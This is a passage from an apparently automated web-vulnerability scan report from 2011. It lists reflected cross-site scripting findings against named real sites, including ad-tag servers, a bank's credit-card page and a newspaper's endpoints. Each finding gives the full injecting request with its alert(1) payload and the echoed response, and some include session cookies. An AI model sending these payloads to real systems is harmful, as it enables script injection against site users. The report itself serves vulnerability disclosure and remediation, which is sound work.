Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP200
Last-Modified: Mon, 26 Sep 02011 13:33:25 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 27 Sep 2011 13:21:30 GMT
Content-Length: 8886
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:10 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740c9977";alert(1)//0077425797b";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740c9977";alert(1)//0077425797b";var ct="104418";var cf="160X600";var cn="
...[SNIP]...

2.254. http://tag.contextweb.com/TagPublish/getjs.aspx [cwpnet parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwpnet request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7f2c"%3balert(1)//56adfbce4e7 was submitted in the cwpnet parameter. This input was echoed as c7f2c";alert(1)//56adfbce4e7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740&cwwidth=160&cwheight=600&cwpnet=1c7f2c"%3balert(1)//56adfbce4e7&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP201
Last-Modified: Mon, 26 Sep 02011 15:35:33 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 27 Sep 2011 13:21:31 GMT
Content-Length: 8858
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:11 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740";var ct="104418";var cf="160X600";var cn="1c7f2c";alert(1)//56adfbce4e7";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.toLowerCase()) != -1);
       };
       var _nxy = [-1,-1];
       var _cwd = document;
       var _cww = wi
...[SNIP]...

2.255. http://tag.contextweb.com/TagPublish/getjs.aspx [cwrun parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwrun request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c199"%3balert(1)//8ec6410f92 was submitted in the cwrun parameter. This input was echoed as 9c199";alert(1)//8ec6410f92 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=2009c199"%3balert(1)//8ec6410f92&cwadformat=160X600&cwpid=537740&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP200
Last-Modified: Mon, 26 Sep 02011 13:33:25 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Date: Tue, 27 Sep 2011 13:21:30 GMT
Content-Length: 8857
Connection: close
Vary: Accept-Encoding
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:10 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="2009c199";alert(1)//8ec6410f92";var cw="160";var ch="600";var cads="0";var cp="537740";var ct="104418";var cf="160X600";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase()
...[SNIP]...

2.256. http://tag.contextweb.com/TagPublish/getjs.aspx [cwtagid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwtagid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64178"%3balert(1)//984de474d19 was submitted in the cwtagid parameter. This input was echoed as 64178";alert(1)//984de474d19 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740&cwwidth=160&cwheight=600&cwpnet=1&cwtagid=10441864178"%3balert(1)//984de474d19 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP210
Last-Modified: Mon, 26 Sep 02011 15:56:15 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8886
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:32 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:12 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="10441864178";alert(1)//984de474d19";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160";var ch="600";var cads="0";var cp="537740";var ct="10441864178";alert(1)//984de474d19";var cf="160X600";var cn="1";var epid="";var es
...[SNIP]...

2.257. http://tag.contextweb.com/TagPublish/getjs.aspx [cwwidth parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://tag.contextweb.com
Path:   /TagPublish/getjs.aspx

Issue detail

The value of the cwwidth request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a8e81"%3balert(1)//df54c597de0 was submitted in the cwwidth parameter. This input was echoed as a8e81";alert(1)//df54c597de0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /TagPublish/getjs.aspx?action=VIEWAD&cwrun=200&cwadformat=160X600&cwpid=537740&cwwidth=160a8e81"%3balert(1)//df54c597de0&cwheight=600&cwpnet=1&cwtagid=104418 HTTP/1.1
Host: tag.contextweb.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://tag.admeld.com/ad/iframe/725/nydailynews/160x600/nydnros_btf?t=1317129699572&tz=300&m=0&hu=&ht=js&hp=0&fo=&url=http%3A%2F%2Fwww.nydailynews.com%2Fnews%2Fny_crime%2F2011%2F09%2F26%2F2011-09-26_activists_post_identity_of_nypd_officer_who_peppersprayed_wall_street_protesters.html&refer=http%3A%2F%2Fwww.nydailynews.com%2Findex.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: C2W4=0; FC1-WCR=132982_1_3DL0Q; pb_rtb_ev="1:537085.439524AE8C6B634E021F5F7802166020.0|535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0|535495.b6ae888c-d95b-11e0-b096-0025900e0834.0"; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%3B10%2F14%2F2011%3BEHEX1%0A3196%3B10%2F07%2F2011%3BSMTC1%0A996%3B10%2F12%2F2011%3BFACO1%0A2712%3B10%2F19%2F2011%3BBMBN1%0A553%3B10%2F23%2F2011%3BMIWO2

Response

HTTP/1.1 200 OK
Server: GlassFish v3
CW-Server: CW-APP209
Last-Modified: Mon, 26 Sep 02011 15:53:50 EDT
Content-Type: application/x-javascript;charset=utf-8
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT"
Cache-Control: private
Content-Length: 8858
Vary: Accept-Encoding
Date: Tue, 27 Sep 2011 13:21:31 GMT
Connection: close
Set-Cookie: cw=cw; Domain=.contextweb.com; Expires=Tue, 27-Sep-2011 16:08:11 GMT; Path=/

function cw_Process() {
   try {
       var cu="http://tag.contextweb.com/TagPublish/GetAd.aspx";var cwpid="537740";var cwtagid="104418";var cwadformat="160X600";var ca="VIEWAD";var cr="200";var cw="160a8e81";alert(1)//df54c597de0";var ch="600";var cads="0";var cp="537740";var ct="104418";var cf="160X600";var cn="1";var epid="";var esid="";

       String.prototype.cwcontains = function(s) {
           return(this.toLowerCase().indexOf(s.to
...[SNIP]...

2.258. http://wd.sharethis.com/api/getCount2.php [cb parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The value of the cb request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c8f8d%3balert(1)//825b094929d was submitted in the cb parameter. This input was echoed as c8f8d;alert(1)//825b094929d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /api/getCount2.php?cb=stButtons.processCBc8f8d%3balert(1)//825b094929d&url=http%3A%2F%2Fwww.computerworld.com%2Fs%2Farticle%2F9220295%2FMySQL.com_hacked_to_serve_malware HTTP/1.1
Host: wd.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.computerworld.com/s/article/9220295/MySQL.com_hacked_to_serve_malware?taxonomyId=17
Cookie: __stid=CqIZrE48YIeMTxMbAzqQAg==

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 26 Sep 2011 20:38:30 GMT
Content-Type: text/html
Connection: keep-alive
Content-Length: 202

(function(){stButtons.processCBc8f8d;alert(1)//825b094929d({"error":true,"errorMessage":"Epic Fail","ourl":"http:\/\/www.computerworld.com\/s\/article\/9220295\/MySQL.com_hacked_to_serve_malware"})})();

2.259. http://www.checksitetraffic.com/traffic_spy/xss.cx [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/xss.cx

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a534e<img%20src%3da%20onerror%3dalert(1)>43a610f78b4 was submitted in the REST URL parameter 2. This input was echoed as a534e<img src=a onerror=alert(1)>43a610f78b4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /traffic_spy/xss.cxa534e<img%20src%3da%20onerror%3dalert(1)>43a610f78b4 HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: PHPSESSID=b5274bbcfce30657a609a765c232daaa; __utma=11725670.424988600.1317071405.1317071405.1317071405.1; __utmb=11725670.1.10.1317071405; __utmc=11725670; __utmz=11725670.1317071405.1.1.utmcsr=blog.armorize.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:12:09 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 4424

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<h2>No data has been found for xss.cxa534e<img src=a onerror=alert(1)>43a610f78b4</h2>
...[SNIP]...

2.260. http://www.checksitetraffic.com/traffic_spy/ziddu.com [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.checksitetraffic.com
Path:   /traffic_spy/ziddu.com

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b6540<img%20src%3da%20onerror%3dalert(1)>831f05ae54a was submitted in the REST URL parameter 2. This input was echoed as b6540<img src=a onerror=alert(1)>831f05ae54a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Request

GET /traffic_spy/ziddu.comb6540<img%20src%3da%20onerror%3dalert(1)>831f05ae54a HTTP/1.1
Host: www.checksitetraffic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://blog.armorize.com/

Response

HTTP/1.1 200 OK
Date: Mon, 26 Sep 2011 21:09:52 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=utf-8
Content-Length: 4430

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="
...[SNIP]...
<h2>No data has been found for ziddu.comb6540<img src=a onerror=alert(1)>831f05ae54a</h2>
...[SNIP]...

2.261. https://www.nbc.ca/WebInfoWeb/DispatchRequest [lang parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.nbc.ca
Path:   /WebInfoWeb/DispatchRequest

Issue detail

The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af5da"><script>alert(1)</script>ae42f50e56 was submitted in the lang parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /WebInfoWeb/DispatchRequest?aliasDispatcher=orderBusinessCreditCardWelcome&action=3800&lang=enaf5da"><script>alert(1)</script>ae42f50e56&firstCardId=81903&secondCardId=81801&thirdCardId=&numberOfCheckedCard=2&firstCheckBoxName=cardId_81903&secondCheckBoxName=cardId_81801&thirdCheckBoxName=&catId=&cardNumberInput=81903&promoIdentificationInput=CIAN HTTP/1.1
Host: www.nbc.ca
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: https://www.nbc.ca/WebInfoWeb/DispatchRequest?aliasDispatcher=creditCardComparison&cAliasDispatcher=creditCardComparisonError&action=1901&lang=en&firstCardId=81903&firstCheckBoxName=cardId_81903&cardID_81903=on&secondCardId=81801&secondCheckBoxName=cardId_81801&cardID_81801=on&numberOfCheckedCard=2
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: newCookieBNC=1000; _ongletMC=06; JSESSIONID=0000RORNCPD4BNwSVxzUNqUz0oL:-1; lang=en

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 27 Sep 2011 13:42:33 GMT
Content-type: text/html; charset=UTF-8
Content-language: en-US
Set-cookie: lang=fr; Expires=Sun, 06 Sep 2015 13:39:50 GMT; Path=/
Content-Length: 48135


<html>
   <head>
       <meta HTTP-EQUIV="Content-Type" content="text/html; charset=utf-8">
       <title>MasterCard credit card application</title>
       <
...[SNIP]...
<input type="hidden" name="lang" value="enaf5da"><script>alert(1)</script>ae42f50e56">
...[SNIP]...

2.262. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [batchId parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 643a1'-alert(1)-'22da1726db7c9a5f3 was submitted in the batchId parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=0&c0-param0=string:%2F&batchId=0643a1'-alert(1)-'22da1726db7c9a5f3 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:30:09 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 2315

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="8 stolen siblings found safe in PA";s0.url="http://www.nydai
...[SNIP]...
cher";s9.url="http://www.nydailynews.com/news/ny_crime/2011/09/27/2011-09-27_slash_victims_former_teacher_says_student_deserved_better_future_teen_girls_butc.html";
dwr.engine._remoteHandleCallback('0643a1'-alert(1)-'22da1726db7c9a5f3','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);

2.263. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6de3d'-alert(1)-'eb3ea7fc9d9f5ea2f was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr?callCount=1&page=/index.html&httpSessionId=&scriptSessionId=3051AE2B8D71AA44AF807982E5BE96C8637&c0-scriptName=mostPopularStories&c0-methodName=getMostPopularStoriesLists&c0-id=06de3d'-alert(1)-'eb3ea7fc9d9f5ea2f&c0-param0=string:%2F&batchId=0 HTTP/1.1
Host: www.nydailynews.com
Proxy-Connection: keep-alive
Origin: http://www.nydailynews.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.nydailynews.com/index.html
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-229162790-1315773961012; __utma=263866259.366694639.1315773952.1315773952.1315773952.1; __utmz=263866259.1315773952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Zvents=v8jp7ej93n; __vrf=5gqecvg9ez9yrb4n; __vru=http://www.nydailynews.com/index.html; zvents_tracker_sid=13171296713740.4048269435297698

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
X-Powered-By: Servlet 2.4; JBoss-4.0.5.GA (build: CVSTag=Branch_4_0 date=200610162339)/Tomcat-5.5
Content-Type: text/plain;charset=ISO-8859-1
Date: Tue, 27 Sep 2011 13:30:08 GMT
Age: 0
Via: AX-CACHE-2.4:20
Vary: Accept-encoding
Content-Length: 2315

//#DWR-INSERT
//#DWR-REPLY
var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="8 stolen siblings found safe in PA";s0.url="http://www.nydai
...[SNIP]...
";s9.url="http://www.nydailynews.com/news/ny_crime/2011/09/27/2011-09-27_slash_victims_former_teacher_says_student_deserved_better_future_teen_girls_butc.html";
dwr.engine._remoteHandleCallback('0','06de3d'-alert(1)-'eb3ea7fc9d9f5ea2f',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);

2.264. http://www.nydailynews.com/nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr [c0-methodName parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.nydailynews.com
Path:   /nydn/dwr/call/plaincall/mostPopularStories.getMostPopularStoriesLists.dwr

Issue detail

